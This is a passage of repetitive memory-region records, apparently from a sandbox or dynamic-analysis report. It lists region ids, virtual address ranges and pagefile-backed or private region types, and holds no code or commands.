0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4319 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4320 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4321 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4322 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4323 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4324 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4325 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4326 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4327 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4328 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4329 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4330 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4331 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4332 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4333 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4334 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4335 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4336 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4337 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4338 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4339 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4340 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4341 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4342 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4343 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4344 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4345 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4346 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4347 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4348 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4349 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4350 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4351 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4352 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4353 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4354 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4355 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4356 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4357 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4358 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4359 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4360 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4361 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4362 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4363 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4364 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4365 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4366 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4367 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4368 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4369 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4370 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4371 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4372 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4373 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4374 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4375 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4376 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4377 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4378 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4379 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4380 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4381 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4382 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4383 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4384 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4385 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4386 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4387 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4388 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4389 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4390 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4391 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4392 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4393 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4394 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4395 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4396 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4397 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4398 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4399 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4400 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4401 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4402 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4403 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4404 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4405 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4406 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4407 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4408 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4409 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4410 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4411 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4412 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4413 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4414 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4415 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4416 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4417 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4418 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4419 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4420 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4421 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4422 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4423 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4424 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4425 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4426 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4427 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4428 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4429 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4430 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4431 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4432 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4433 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4434 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4435 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4436 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4437 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4438 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4439 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4440 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4441 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4442 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4443 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4444 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4445 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4446 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4447 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4448 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4449 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4450 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4451 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4452 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4453 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4454 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4455 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4456 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4457 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4458 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4459 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4460 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4461 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4462 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4463 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4464 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4465 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4466 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4467 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4468 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4469 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4470 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4471 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4472 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4473 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4474 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4475 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4476 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4477 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4478 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4479 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4480 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4481 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4482 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4483 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4484 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4485 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4486 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4487 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4488 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4489 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4490 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4491 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4492 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4493 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4494 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4495 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4496 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4497 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4498 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4499 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4500 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4501 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4502 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4503 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4504 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4505 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4506 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4507 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4508 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4509 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4510 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4511 start_va = 0x470000 end_va = 0x472fff monitored = 1 entry_point = 